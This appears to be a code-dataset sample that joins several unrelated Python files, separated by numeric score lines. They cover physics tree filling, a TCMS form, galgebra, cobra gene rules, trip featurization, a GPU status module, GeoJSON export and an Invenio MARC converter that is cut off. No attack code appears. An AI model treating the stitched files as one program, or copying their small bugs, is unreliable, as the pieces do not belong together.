self.mc_truth_tree.fill('dminus_py', dminus.p.py)
self.mc_truth_tree.fill('dminus_pz', dminus.p.pz)
self.mc_truth_tree.fill('pi1_dminus_q', pi1_dminus.charge)
self.mc_truth_tree.fill('pi1_dminus_px', pi1_dminus.p.px)
self.mc_truth_tree.fill('pi1_dminus_py', pi1_dminus.p.py)
self.mc_truth_tree.fill('pi1_dminus_pz', pi1_dminus.p.pz)
self.mc_truth_tree.fill('pi2_dminus_q', pi2_dminus.charge)
self.mc_truth_tree.fill('pi2_dminus_px', pi2_dminus.p.px)
self.mc_truth_tree.fill('pi2_dminus_py', pi2_dminus.p.py)
self.mc_truth_tree.fill('pi2_dminus_pz', pi2_dminus.p.pz)
self.mc_truth_tree.fill('pi3_dminus_q', pi3_dminus.charge)
self.mc_truth_tree.fill('pi3_dminus_px', pi3_dminus.p.px)
self.mc_truth_tree.fill('pi3_dminus_py', pi3_dminus.p.py)
self.mc_truth_tree.fill('pi3_dminus_pz', pi3_dminus.p.pz)
self.mc_truth_tree.fill('k0_dminus_px', k0_dminus.p.px)
self.mc_truth_tree.fill('k0_dminus_py', k0_dminus.p.py)
self.mc_truth_tree.fill('k0_dminus_pz', k0_dminus.p.pz)
self.mc_truth_tree.tree.Fill()
# matching visible particles and MC truth ones
tv_tauplus = tv_dplus
pi1_tauplus = pi1_dplus
pi2_tauplus = pi2_dplus
pi3_tauplus = pi3_dplus
tv_tauminus = tv_dminus
pi1_tauminus = pi1_dminus
pi2_tauminus = pi2_dminus
pi3_tauminus = pi3_dminus
# filling event information
self.tree.fill('event_number', event_number)
self.tree.fill('n_particles', n_particles)
self.tree.fill('pv_x', numpy.random.normal(pv.x, self.cfg_ana.pv_x_resolution) if self.cfg_ana.smear_pv else pv.x)
self.tree.fill('pv_y', numpy.random.normal(pv.y, self.cfg_ana.pv_y_resolution) if self.cfg_ana.smear_pv else pv.y)
self.tree.fill('pv_z', numpy.random.normal(pv.z, self.cfg_ana.pv_z_resolution) if self.cfg_ana.smear_pv else pv.z)
self.tree.fill('sv_x', numpy.random.normal(sv.x, self.cfg_ana.sv_x_resolution) if self.cfg_ana.smear_sv else sv.x)
self.tree.fill('sv_y', numpy.random.normal(sv.y, self.cfg_ana.sv_y_resolution) if self.cfg_ana.smear_sv else sv.y)
self.tree.fill('sv_z', numpy.random.normal(sv.z, self.cfg_ana.sv_z_resolution) if self.cfg_ana.smear_sv else sv.z)
self.tree.fill('tv_tauplus_x', numpy.random.normal(tv_tauplus.x, self.cfg_ana.tv_x_resolution) if self.cfg_ana.smear_tv else tv_tauplus.x)
self.tree.fill('tv_tauplus_y', numpy.random.normal(tv_tauplus.y, self.cfg_ana.tv_y_resolution) if self.cfg_ana.smear_tv else tv_tauplus.y)
self.tree.fill('tv_tauplus_z', numpy.random.normal(tv_tauplus.z, self.cfg_ana.tv_z_resolution) if self.cfg_ana.smear_tv else tv_tauplus.z)
self.tree.fill('tv_tauminus_x', numpy.random.normal(tv_tauminus.x, self.cfg_ana.tv_x_resolution) if self.cfg_ana.smear_tv else tv_tauminus.x)
self.tree.fill('tv_tauminus_y', numpy.random.normal(tv_tauminus.y, self.cfg_ana.tv_y_resolution) if self.cfg_ana.smear_tv else tv_tauminus.y)
self.tree.fill('tv_tauminus_z', numpy.random.normal(tv_tauminus.z, self.cfg_ana.tv_z_resolution) if self.cfg_ana.smear_tv else tv_tauminus.z)
self.tree.fill('pi1_tauplus_q', pi1_tauplus.charge)
self.tree.fill('pi1_tauplus_px', numpy.random.normal(pi1_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.px)
self.tree.fill('pi1_tauplus_py', numpy.random.normal(pi1_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.py)
self.tree.fill('pi1_tauplus_pz', numpy.random.normal(pi1_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.pz)
self.tree.fill('pi2_tauplus_q', pi2_tauplus.charge)
self.tree.fill('pi2_tauplus_px', numpy.random.normal(pi2_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.px)
self.tree.fill('pi2_tauplus_py', numpy.random.normal(pi2_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.py)
self.tree.fill('pi2_tauplus_pz', numpy.random.normal(pi2_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.pz)
self.tree.fill('pi3_tauplus_q', pi3_tauplus.charge)
self.tree.fill('pi3_tauplus_px', numpy.random.normal(pi3_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.px)
self.tree.fill('pi3_tauplus_py', numpy.random.normal(pi3_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.py)
self.tree.fill('pi3_tauplus_pz', numpy.random.normal(pi3_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.pz)
self.tree.fill('pi1_tauminus_q', pi1_tauminus.charge)
self.tree.fill('pi1_tauminus_px', numpy.random.normal(pi1_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.px)
self.tree.fill('pi1_tauminus_py', numpy.random.normal(pi1_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.py)
self.tree.fill('pi1_tauminus_pz', numpy.random.normal(pi1_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.pz)
self.tree.fill('pi2_tauminus_q', pi2_tauminus.charge)
self.tree.fill('pi2_tauminus_px', numpy.random.normal(pi2_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.px)
self.tree.fill('pi2_tauminus_py', numpy.random.normal(pi2_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.py)
self.tree.fill('pi2_tauminus_pz', numpy.random.normal(pi2_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.pz)
self.tree.fill('pi3_tauminus_q', pi3_tauminus.charge)
self.tree.fill('pi3_tauminus_px', numpy.random.normal(pi3_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.px)
self.tree.fill('pi3_tauminus_py', numpy.random.normal(pi3_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.py)
self.tree.fill('pi3_tauminus_pz', numpy.random.normal(pi3_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.pz)
self.tree.fill('k_q', k.charge)
self.tree.fill('k_px', numpy.random.normal(k.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else k.p.px)
self.tree.fill('k_py', numpy.random.normal(k.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else k.p.py)
self.tree.fill('k_pz', numpy.random.normal(k.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else k.p.pz)
self.tree.fill('pi_kstar_q', pi_kstar.charge)
self.tree.fill('pi_kstar_px', numpy.random.normal(pi_kstar.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.px)
self.tree.fill('pi_kstar_py', numpy.random.normal(pi_kstar.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.py)
self.tree.fill('pi_kstar_pz', numpy.random.normal(pi_kstar.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.pz)
self.tree.tree.Fill()
| 0.004979 |
# -*- coding: utf-8 -*-
"""
Define forms for each request for validating request arguments
"""
from django import forms
from tcms.testruns.models import TestCaseRun
from tcms.core.forms.fields import StripURLField
__all__ = (
"BasicValidationForm",
"AddLinkReferenceForm",
)
LINKREF_TARGET = {
"TestCaseRun": TestCaseRun,
}
class TargetCharField(forms.CharField):
"""Return clean Model class besides all of CharField"""
default_error_messages = {
"invalid_target": "Invalid target %(value)s. TCMS cannot determine the"
" model class according to this target."
}
def __init__(self, targets={}, *args, **kwargs):
super().__init__(*args, **kwargs)
self.targets = targets
def clean(self, value):
"""Return the Model class object associated with the value"""
super().clean(value)
model_class = self.targets.get(value, None)
if model_class is None:
raise forms.ValidationError(self.error_messages["invalid_target"] % {"value": value})
return model_class
class BasicValidationForm(forms.Form):
"""Validate target and target ID basically"""
target = TargetCharField(
targets=LINKREF_TARGET,
error_messages={
"required": "Due to miss the target argument, TCMS does not know "
"to which the new link will be linked."
},
)
target_id = forms.IntegerField(
error_messages={
"required": "target ID argument should appear in the request for "
"adding new link as long as the target argument."
}
)
class AddLinkReferenceForm(BasicValidationForm):
"""Validate the argument within the request for adding new link"""
name = forms.CharField(error_messages={"required": "You should name this new link."})
url = StripURLField(error_messages={"required": "Missing URL."})
| 0.00105 |
from sympy import symbols, sin, pi, latex
from galgebra.ga import Ga
from galgebra.printer import Format, xpdf
Format()
coords = (r, th, phi) = symbols('r,theta,phi', real=True)
sp3d = Ga('e_r e_th e_ph', g=[1, r**2, r**2 * sin(th)**2],
coords=coords, norm=True)
sph_uv = (u, v) = symbols('u,v', real=True)
sph_map = [1, u, v] # Coordinate map for sphere of r = 1
sph2d = sp3d.sm(sph_map, sph_uv)
print(r'(u,v)\rightarrow (r,\theta,\phi) = ', latex(sph_map))
# FIXME submanifold basis vectors are not normalized, g is incorrect
print('g =', latex(sph2d.g))
F = sph2d.mv('F', 'vector', f=True) # scalar function
f = sph2d.mv('f', 'scalar', f=True) # vector function
print(r'\nabla f =', sph2d.grad * f)
print('F =', F)
print(r'\nabla F = ', sph2d.grad * F)
cir_s = s = symbols('s', real=True)
cir_map = [pi / 8, s]
cir1d = sph2d.sm(cir_map, (cir_s,))
print('g =', latex(cir1d.g))
h = cir1d.mv('h', 'scalar', f=True)
H = cir1d.mv('H', 'vector', f=True)
print(r'(s)\rightarrow (u,v) = ', latex(cir_map))
print('H =', H)
print(latex(H))
print(r'\nabla h =', cir1d.grad * h)
print(r'\nabla H =', cir1d.grad * H)
xpdf(filename='submanifold.tex', paper=(6, 5), crop=True)
| 0.000845 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import re
from ast import parse as ast_parse
from ast import (
And, BitAnd, BitOr, BoolOp, Expression, Name, NodeTransformer, Or)
from keyword import kwlist
from warnings import warn
from cobra.core.species import Species
from cobra.util import resettable
from cobra.util.util import format_long_string
keywords = list(kwlist)
keywords.remove("and")
keywords.remove("or")
keywords.extend(("True", "False"))
keyword_re = re.compile(r"(?=\b(%s)\b)" % "|".join(keywords))
number_start_re = re.compile(r"(?=\b[0-9])")
replacements = (
(".", "__COBRA_DOT__"),
("'", "__COBRA_SQUOTE__"),
('"', "__COBRA_DQUOTE__"),
(":", "__COBRA_COLON__"),
("/", "__COBRA_FSLASH__"),
("\\", "__COBRA_BSLASH"),
("-", "__COBRA_DASH__"),
("=", "__COBRA_EQ__")
)
# functions for gene reaction rules
def ast2str(expr, level=0, names=None):
"""convert compiled ast to gene_reaction_rule str
Parameters
----------
expr : str
string for a gene reaction rule, e.g "a and b"
level : int
internal use only
names : dict
Dict where each element id a gene identifier and the value is the
gene name. Use this to get a rule str which uses names instead. This
should be done for display purposes only. All gene_reaction_rule
strings which are computed with should use the id.
Returns
------
string
The gene reaction rule
"""
if isinstance(expr, Expression):
return ast2str(expr.body, 0, names) \
if hasattr(expr, "body") else ""
elif isinstance(expr, Name):
return names.get(expr.id, expr.id) if names else expr.id
elif isinstance(expr, BoolOp):
op = expr.op
if isinstance(op, Or):
str_exp = " or ".join(ast2str(i, level + 1, names)
for i in expr.values)
elif isinstance(op, And):
str_exp = " and ".join(ast2str(i, level + 1, names)
for i in expr.values)
else:
raise TypeError("unsupported operation " + op.__class__.__name)
return "(" + str_exp + ")" if level else str_exp
elif expr is None:
return ""
else:
raise TypeError("unsupported operation " + repr(expr))
def eval_gpr(expr, knockouts):
"""evaluate compiled ast of gene_reaction_rule with knockouts
Parameters
----------
expr : Expression
The ast of the gene reaction rule
knockouts : DictList, set
Set of genes that are knocked out
Returns
-------
bool
True if the gene reaction rule is true with the given knockouts
otherwise false
"""
if isinstance(expr, Expression):
return eval_gpr(expr.body, knockouts)
elif isinstance(expr, Name):
return expr.id not in knockouts
elif isinstance(expr, BoolOp):
op = expr.op
if isinstance(op, Or):
return any(eval_gpr(i, knockouts) for i in expr.values)
elif isinstance(op, And):
return all(eval_gpr(i, knockouts) for i in expr.values)
else:
raise TypeError("unsupported operation " + op.__class__.__name__)
elif expr is None:
return True
else:
raise TypeError("unsupported operation " + repr(expr))
class GPRCleaner(NodeTransformer):
"""Parses compiled ast of a gene_reaction_rule and identifies genes
Parts of the tree are rewritten to allow periods in gene ID's and
bitwise boolean operations"""
def __init__(self):
NodeTransformer.__init__(self)
self.gene_set = set()
def visit_Name(self, node):
if node.id.startswith("__cobra_escape__"):
node.id = node.id[16:]
for char, escaped in replacements:
if escaped in node.id:
node.id = node.id.replace(escaped, char)
self.gene_set.add(node.id)
return node
def visit_BinOp(self, node):
self.generic_visit(node)
if isinstance(node.op, BitAnd):
return BoolOp(And(), (node.left, node.right))
elif isinstance(node.op, BitOr):
return BoolOp(Or(), (node.left, node.right))
else:
raise TypeError("unsupported operation '%s'" %
node.op.__class__.__name__)
def parse_gpr(str_expr):
"""parse gpr into AST
Parameters
----------
str_expr : string
string with the gene reaction rule to parse
Returns
-------
tuple
elements ast_tree and gene_ids as a set
"""
str_expr = str_expr.strip()
if len(str_expr) == 0:
return None, set()
for char, escaped in replacements:
if char in str_expr:
str_expr = str_expr.replace(char, escaped)
escaped_str = keyword_re.sub("__cobra_escape__", str_expr)
escaped_str = number_start_re.sub("__cobra_escape__", escaped_str)
tree = ast_parse(escaped_str, "<string>", "eval")
cleaner = GPRCleaner()
cleaner.visit(tree)
eval_gpr(tree, set()) # ensure the rule can be evaluated
return tree, cleaner.gene_set
class Gene(Species):
"""A Gene in a cobra model
Parameters
----------
id : string
The identifier to associate the gene with
name: string
A longer human readable name for the gene
functional: bool
Indicates whether the gene is functional. If it is not functional
then it cannot be used in an enzyme complex nor can its products be
used.
"""
def __init__(self, id=None, name="", functional=True):
Species.__init__(self, id=id, name=name)
self._functional = functional
@property
def functional(self):
"""A flag indicating if the gene is functional.
Changing the flag is reverted upon exit if executed within the model
as context.
"""
return self._functional
@functional.setter
@resettable
def functional(self, value):
if not isinstance(value, bool):
raise ValueError('expected boolean')
self._functional = value
def knock_out(self):
"""Knockout gene by marking it as non-functional and setting all
associated reactions bounds to zero.
The change is reverted upon exit if executed within the model as
context.
"""
self.functional = False
for reaction in self.reactions:
if not reaction.functional:
reaction.bounds = (0, 0)
def remove_from_model(self, model=None,
make_dependent_reactions_nonfunctional=True):
"""Removes the association
Parameters
----------
model : cobra model
The model to remove the gene from
make_dependent_reactions_nonfunctional : bool
If True then replace the gene with 'False' in the gene
association, else replace the gene with 'True'
.. deprecated :: 0.4
Use cobra.manipulation.delete_model_genes to simulate knockouts
and cobra.manipulation.remove_genes to remove genes from
the model.
"""
warn("Use cobra.manipulation.remove_genes instead")
if model is not None:
if model != self._model:
raise Exception("%s is a member of %s, not %s" %
(repr(self), repr(self._model), repr(model)))
if self._model is None:
raise Exception('%s is not in a model' % repr(self))
if make_dependent_reactions_nonfunctional:
gene_state = 'False'
else:
gene_state = 'True'
the_gene_re = re.compile('(^|(?<=( |\()))%s(?=( |\)|$))' %
re.escape(self.id))
self._model.genes.remove(self)
self._model = None
for the_reaction in list(self._reaction):
the_reaction._gene_reaction_rule = the_gene_re.sub(
gene_state, the_reaction.gene_reaction_rule)
the_reaction._genes.remove(self)
# Now, deactivate the reaction if its gene association evaluates
# to False
the_gene_reaction_relation = the_reaction.gene_reaction_rule
for other_gene in the_reaction._genes:
other_gene_re = re.compile('(^|(?<=( |\()))%s(?=( |\)|$))' %
re.escape(other_gene.id))
the_gene_reaction_relation = other_gene_re.sub(
'True',
the_gene_reaction_relation)
if not eval(the_gene_reaction_relation):
the_reaction.lower_bound = 0
the_reaction.upper_bound = 0
self._reaction.clear()
def _repr_html_(self):
return """
<table>
<tr>
<td><strong>Gene identifier</strong></td><td>{id}</td>
</tr><tr>
<td><strong>Name</strong></td><td>{name}</td>
</tr><tr>
<td><strong>Memory address</strong></td>
<td>{address}</td>
</tr><tr>
<td><strong>Functional</strong></td><td>{functional}</td>
</tr><tr>
<td><strong>In {n_reactions} reaction(s)</strong></td><td>
{reactions}</td>
</tr>
</table>""".format(id=self.id, name=self.name,
functional=self.functional,
address='0x0%x' % id(self),
n_reactions=len(self.reactions),
reactions=format_long_string(
', '.join(r.id for r in self.reactions), 200))
| 0.00041 |
#!/usr/bin/env python3
""" This script featurizes the data
(low level features: cartesian --> polar --> velocity --> acceleration)
For each file(trip) in path, loads data into a pandas DataFrame, adds features,
pickles DataFrame and saves in file with corresponding name
Dependencies: Python3, Pandas, Numpy, Theano, Lasagne
Command Line Arguments:
-source Data source folder, expects unzipped data
-dest Destination folder
-procs Number of processes to spawn during featurizing
Eg:
$ python3 featurize_data.py -source data/drivers -dest data/drivers_featurized -procs 4
"""
__author__ = 'Sid Pramod'
__all__ = ['featurize_trip, featurize_driver, featurize_all']
import argparse
import os
import errno
import warnings
import numpy as np
import pandas as pd
import multiprocessing
def _parse_cmd():
""" Parse command line arguments."""
cmd = argparse.ArgumentParser(description='Run Classifier')
cmd.add_argument('-source', default='data/drivers', help='Data source folder (unzipped)')
cmd.add_argument('-dest', default='data/drivers_featurized', help='Destination folder')
cmd.add_argument('-procs', default=4, type=int, help='Number of processes to spawn')
options = cmd.parse_args()
try:
os.makedirs(options.dest)
except OSError as exception:
if exception.errno == errno.EEXIST:
warnings.warn('Folder {0} already exists, files may be overwritten'.format(options.dest))
else:
raise
return options
def _load_csv_trip(filename, dtype=np.float64):
""" Load data corresponding to a single trip from csv file named `filename`."""
df = pd.DataFrame.from_csv(path=filename, index_col=None).astype(dtype)
np.testing.assert_equal(df.columns, np.array(['x', 'y']))
# from the data, it seems all positions are relative since they all seem to start at 0, 0;
# asserting to make sure and explicit
np.testing.assert_equal(df.iloc[0], np.array([0, 0]))
# remove any nan
df.interpolate()
assert(not np.any(np.isnan(df.values)))
return df
def _get_polar_trip(df):
""" Obtain polar co-ordinates from cartesian."""
assert('x' in df.columns and 'y' in df.columns)
# Reference x and y
x, y = df['x'], df['y']
# Get polar co-ordinates
df['r'] = np.sqrt(x ** 2 + y ** 2)
df['th'] = np.arctan2(y, x)
return
def _get_velocity_trip(df):
""" Add velocities. Assumes df has polar co-ords."""
assert('r' in df.columns and 'th' in df.columns)
# Reference r and th
r, th = df['r'], df['th']
# Get velocities in r and th directions
dt = 1
df['vel_r'] = np.gradient(r, dt)
df['vel_th'] = np.gradient(th, dt)
return
def _get_acceleration_trip(df):
""" Add accelerations. Assumes df has velocities."""
assert('vel_r' in df.columns and 'vel_th' in df.columns)
# Reference vel_r and vel_th
vel_r, vel_th = df['vel_r'], df['vel_th']
# Get velocities in r and th directions
dt = 1
df['acc_r'] = np.gradient(vel_r, dt)
df['acc_th'] = np.gradient(vel_th, dt)
return
def _add_features_trip(df):
""" Convert to polar, add first and second derivative (velocity and acceleration)."""
_get_polar_trip(df)
_get_velocity_trip(df)
_get_acceleration_trip(df)
return
def featurize_trip(source_file, dest_file):
""" Do all that this program is supposed to for a single trip."""
if source_file == dest_file:
raise ValueError('Source file cannot be destination file, overwriting disabled.')
df = _load_csv_trip(source_file)
_add_features_trip(df)
if not os.path.exists(os.path.dirname(dest_file)):
os.makedirs(os.path.dirname(dest_file))
df.astype(np.float32).to_pickle(dest_file)
return
def featurize_driver(source_folder, dest_folder):
""" Do all that this program is supposed to for all trips from a single driver."""
if source_folder == dest_folder:
raise ValueError('Source folder cannot be destination folder, overwriting disabled.')
files = [f for f in os.listdir(source_folder)
if os.path.isfile(os.path.join(source_folder, f))]
source = lambda f: os.path.join(source_folder, f)
dest = lambda f: os.path.join(dest_folder, os.path.splitext(f)[0] + '.pkl')
for f in files:
featurize_trip(source(f), dest(f))
return
def featurize_all(source_folder, dest_folder, multiproc_poolsize=1):
""" Do all that this program is supposed to for all trips from all drivers."""
if source_folder == dest_folder:
raise ValueError('Source folder cannot be destination folder, overwriting disabled.')
sub_folders = [s for s in os.listdir(source_folder)
if os.path.isdir(os.path.join(source_folder, s))]
pool = multiprocessing.Pool(multiproc_poolsize)
source_sub_folder = lambda s: os.path.join(source_folder, s)
dest_sub_folder = lambda s: os.path.join(dest_folder, s)
pool.starmap(featurize_driver, [(source_sub_folder(s), dest_sub_folder(s)) for s in sub_folders])
return
def main():
options = _parse_cmd()
featurize_all(source_folder=options.source, dest_folder=options.dest, multiproc_poolsize=options.procs)
if __name__ == '__main__':
main()
| 0.003925 |
from i3pystatus import IntervalModule
from .utils import gpu
class GPUMemory(IntervalModule):
"""
Shows GPU memory load
Currently Nvidia only and nvidia-smi required
.. rubric:: Available formatters
* {avail_mem}
* {percent_used_mem}
* {used_mem}
* {total_mem}
"""
settings = (
("format", "format string used for output."),
("divisor", "divide all megabyte values by this value, default is 1 (megabytes)"),
("warn_percentage", "minimal percentage for warn state"),
("alert_percentage", "minimal percentage for alert state"),
("color", "standard color"),
("warn_color", "defines the color used wann warn percentage ist exceeded"),
("alert_color", "defines the color used when alert percentage is exceeded"),
("round_size", "defines number of digits in round"),
)
format = "{avail_mem} MiB"
divisor = 1
color = "#00FF00"
warn_color = "#FFFF00"
alert_color = "#FF0000"
warn_percentage = 50
alert_percentage = 80
round_size = 1
def run(self):
info = gpu.query_nvidia_smi()
if info.used_mem is not None and info.total_mem is not None:
mem_percent = 100 * info.used_mem / info.total_mem
else:
mem_percent = None
if mem_percent >= self.alert_percentage:
color = self.alert_color
elif mem_percent >= self.warn_percentage:
color = self.warn_color
else:
color = self.color
cdict = {
"used_mem": info.used_mem / self.divisor,
"avail_mem": info.avail_mem / self.divisor,
"total_mem": info.total_mem / self.divisor,
"percent_used_mem": mem_percent,
}
for key, value in cdict.items():
if value is not None:
cdict[key] = round(value, self.round_size)
self.data = cdict
self.output = {
"full_text": self.format.format(**cdict),
"color": color
}
| 0.001469 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Author: Alexis Luengas Zimmer
# Created: 5 Dec. 2014
#-------------------------------------------------------------------------------
from os.path import basename, isdir, dirname
import pandas as pd
import igraph as gr
#-------------------------------------------------------------------------------
def collect_data(json_files):
"""
json_files: a list containing json path-strings
Returns a sorted pandas.DataFrame object made up of all json objects
together.
"""
df_list = []
print "Processing..."
for filepath in json_files:
print "\rLoading file \"%s\"" % basename(filepath)
df = build_df(filepath)
df_list.append(df)
df = pd.concat(df_list) # merge list info one DF
df.sort(inplace=True)
return df
def build_df(json_path):
df = pd.read_json(json_path)
df["pid"] = [r["id"] for r in df.reporter] # pid ~ person id
df["name"] = [r["name"] for r in df.reporter]
df = df[["pid", "created_at", "lat", "lng", "name"]].sort(["pid", "created_at"]).set_index("pid")
return df
def df_to_graph(df):
# Build naked graph
g = gr.Graph(len(df.index.levels[0][1:])) # slice out first (anonymous) id
return g
#-------------------------------------------------------------------------------
def write_geojson(df, outpath):
geojson = '{"type":"FeatureCollection","features":['
for pid, fr in df[df.index > 0].groupby(level=0): # exclude id 0 (anonymous)
name = df.ix[pid]["name"] if isinstance(df.ix[pid]["name"], unicode) \
else df.ix[pid]["name"].iloc[0] # take the first name in the list
geojson += ('{"type":"Feature","properties":{"id":'
+ str(pid)
+ ',"name":'
+ '"%s"' % name
+ '},"geometry":{"type":"LineString","coordinates":[')
for i, r in fr.iterrows():
c = "[{0},{1}],".format(r["lng"], r["lat"]) # geojson coordinates follow [lng, lat] formatting
geojson += c
geojson = geojson[:-1] + "]}}," # remove trailing comma of last coord.
geojson = geojson[:-1] + "]}" # remove trailing comma of last path
with open(outpath, "wt") as fout:
fout.write(geojson.encode('utf-8'))
#-------------------------------------------------------------------------------
if __name__ == '__main__':
from optparse import OptionParser
usage = "./%prog [options] path\n\npath -- the path of a JSON file or a directory containing such files."
parser = OptionParser(usage=usage)
parser.add_option("-w",
dest="filename",
type="string",
help="write GeoJSON file to the specified path FILENAME")
(options, args) = parser.parse_args()
# terminal interface
if len(args) > 0:
from os import listdir
from os.path import isfile, abspath, join, splitext
# input path
if isdir(args[0]):
dirpath = args[0]
json_files = [abspath(join(dirpath, f)) for f in listdir(dirpath) \
if isfile(join(dirpath, f)) and splitext(f)[1] == '.json']
elif all([isfile(a) for a in args]) \
and all([a.endswith('.json') for a in args]):
json_files = [abspath(f) for f in args]
else:
raise IOError("Files must be in JSON format")
if len(json_files) == 0:
raise IOError("No JSON files within the directory: " + dirpath)
df = collect_data(json_files)
if options.filename:
write_geojson(df, options.filename)
c = {'green': "\033[92m", 'endc': "\033[0m"}
print c['green'] + "Data written to: " \
+ abspath(options.filename) + c['endc']
else:
parser.print_help()
#-------------------------------------------------------------------------------
| 0.009119 |
# -*- coding: utf-8 -*-
##
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Library of functions for the xmlmarc2textmarc utility."""
from __future__ import generators
__revision__ = "$Id$"
from invenio.bibrecord import \
create_records, \
record_get_field_values, \
record_order_fields
from invenio.config import CFG_CERN_SITE, CFG_SITE_NAME
from random import randint, seed
from os.path import basename
import getopt, sys
## maximum length of an ALEPH MARC record line
CFG_MAXLEN_ALEPH_LINE = 1500
if CFG_CERN_SITE:
## This is a CERN installation. Set the organization's identifier to
## "SzGeCERN". This value will be used when adding the mandatory "003"
## ALEPH control field when translating a MARC XML record that does not
## already have the field.
CFG_ORGANIZATION_IDENTIFIER = "SzGeCERN"
else:
## This is not a CERN installation. The organization's identifier should be
## set with the appropriate value. If it is left empty, MARC XML -> ALEPH
## conversions in INSERT record and REPLACE record modes will fail.
##
## ***NOTE: SET ME!***
##
CFG_ORGANIZATION_IDENTIFIER = ""
def get_fieldname_changes():
"""Get a dictionary of CDS MARC field names to be replaced
with ALEPH fieldnames in an ALEPH MARC record.
@return: dict {'cds_fieldname' : 'replacement_aleph_fieldname',
'cds_fieldname' : 'replacement_aleph_fieldname',
[...]
}
"""
return {
'960' : 'BAS',
'961' : 'CAT',
'962' : 'LKR',
'963' : 'OWN',
'964' : 'ITM',
'970' : 'SYS',
}
def get_fields_dropped_in_aleph():
"""Get a list of fieldnames to be dropped from an ALEPH MARC record.
These fields are dropped before the function
'get_fieldname_changes' is called, so even if they
appear in the dictionary of field-name changes returned by that
function, they won't appear in the output Aleph MARC record.
@return: list [fieldname, fieldname, [...]]
"""
return [
'961',
'970',
'980',
'FFT',
]
def get_aleph_001(sysno):
"""Get a 001 string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " 001 L %s" % (sysno,)
def get_aleph_FMT():
"""Get a FMT string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " FMT L BK"
def get_aleph_OWN():
"""Get an "OWN$$aPUBLIC" string for an ALEPH MARC record, (without
the SYS prefix).
@return: string
"""
return " OWN L $$aPUBLIC"
def get_aleph_DEL():
"""Get a "DEL$$aY" string for an ALEPH MARC record, (without the
SYS prefix).
@return: string
"""
return " DEL L $$aY"
def get_aleph_LDR():
"""Get a LDR string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " LDR L ^^^^^nam^^22^^^^^^a^4500"
def get_aleph_003():
"""Get a 003 string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " 003 L %s" % CFG_ORGANIZATION_IDENTIFIER
def get_aleph_008():
"""Get a 008 string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " 008 L ^^^^^^s^^^^^^^^^^^^^^^^r^^^^^000^0^eng^d"
def get_sysno_generator():
"""Create and return a generator for an ALEPH system number.
The generator will create a 9-digit string, i.e. the sequence
will end when it reaches 1000000000.
@return: generator.
"""
sysno = ""
seed()
## make a 3-digit string for sysno's value:
for dummy in range(0, 3):
sysno += str(randint(1, 9))
sysno = int(sysno)
while sysno < 1000000000:
yield """%09d""" % sysno
sysno = sysno + 1
def create_marc_record(record, sysno, options):
"""Create a text-marc, or aleph-marc record from the contents
of "record", and return it as a string.
@param record: Internal representation of an XML MARC
record, created by bibrecord.
@param sysno: the system number to be used for the record
@param options: the options about the MARC record to be created,
as passed from command line
@return: string (MARC record, either text-marc or ALEPH marc format,
depending upon "options".
"""
out = "" ## String containing record to be printed
display_001 = 0 ## Flag used in ALEPH MARC mode to determine whether
## or not to print the "001" field
## Get a dictionary containing the names of fields to change for
## the output record:
if options["aleph-marc"] == 1:
